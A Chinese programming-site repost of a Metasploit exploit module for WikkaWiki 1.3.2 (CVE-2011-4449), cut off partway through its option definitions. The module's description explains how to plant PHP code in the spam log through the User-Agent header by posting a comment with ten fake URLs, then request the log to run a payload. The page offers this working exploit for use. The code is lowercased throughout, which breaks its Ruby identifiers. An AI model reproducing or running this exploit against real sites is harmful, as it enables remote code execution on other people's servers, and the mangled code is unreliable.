欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

WikkaWiki 1.3.2 Spam Logging PHP注射的方法

程序员文章站 2021-12-19 19:05:29
WikkaWiki 1.3.2 Spam Logging PHP注射的详细方法代码... 12-05-14...
##
# this file is part of the metasploit framework and may be subject to
# redistribution and commercial restrictions. please see the metasploit
# framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class metasploit3 < msf::exploit::remote
rank = excellentranking
include msf::exploit::remote::httpclient
def initialize(info={})
super(update_info(info,
'name' => "wikkawiki 1.3.2 spam logging php injection",
'description' => %q{
this module exploits a vulnerability found in wikkawiki. when the spam logging
feature is enabled, it is possible to inject php code into the spam log file via the
useragent header , and then request it to execute our payload. there are at least
three different ways to trigger spam protection, this module does so by generating
10 fake urls in a comment (by default, the max_new_comment_urls parameter is 6).
please note that in order to use the injection, you must manually pick a page
first that allows you to add a comment, and then set it as 'page'.
},
'license' => msf_license,
'author' =>
[
'egix', #initial discovery, poc
'sinn3r' #metasploit
],
'references' =>
[
['cve', '2011-4449'],
['osvdb', '77391'],
['edb', '18177'],
['url', 'http:// www.jb51.net /trac/wikka/ticket/1098']
],
'payload' =>
{
'badchars' => "\x00"
},
'defaultoptions' =>
{
'exitfunction' => "none"
},
'arch' => arch_php,
'platform' => ['php'],
'targets' =>
[
['wikkawiki 1.3.2 r1814', {}]
],
'privileged' => false,
'disclosuredate' => "nov 30 2011",
'defaulttarget' => 0))
register_options(
[
optstring.new('username', [true, 'wikkawiki username']),
optstring.new('password', [true,
相关标签: PHP